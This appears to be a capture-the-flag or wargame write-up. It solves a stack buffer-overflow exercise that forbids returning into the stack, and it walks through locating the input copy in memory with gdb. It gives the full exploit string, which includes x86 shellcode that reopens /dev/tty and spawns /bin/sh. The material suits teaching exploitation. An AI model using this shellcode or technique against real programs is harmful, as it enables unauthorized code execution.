__builtin_return_address returns the address the RET instruction restores when the function ends. This is the address we usually overwrite with buffer overflow.

This exercise is a simple buffer overflow, however the ret address has restrictions. It cannot be an address from the 0xbf000000 section and we cannot jump to our own shellcode which resides on the stack. We have to find another way to execute our own shellcode.

The copy of the passed argument might be stored at a different place. The address of that place might be different than 0xbf000000.

First I created the input file and determined the position of the address, then I crashed the application and loaded the core dump file into gdb.

$ echo `python -c ‘print “\x41″*80 + “\x42\x42\x42\x42” + “\x43″*100’` > /tmp/1

I listed the segments and tried to find the 0x43’s.

I searched a 0x43434343 pattern. This memory range worked:

(gdb) find /b 0xb7fde000, 0xb7fe2000, 0x43434343

screen-shot-2016-12-01-at-0-21-46

I updated the solution and included the shellcode. I also updated the address.

$ echo `python -c ‘print “\x41″*80 + “\x54\xe0\xfd\xb7” + “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80″‘` > /tmp/1

screen-shot-2016-12-01-at-0-29-28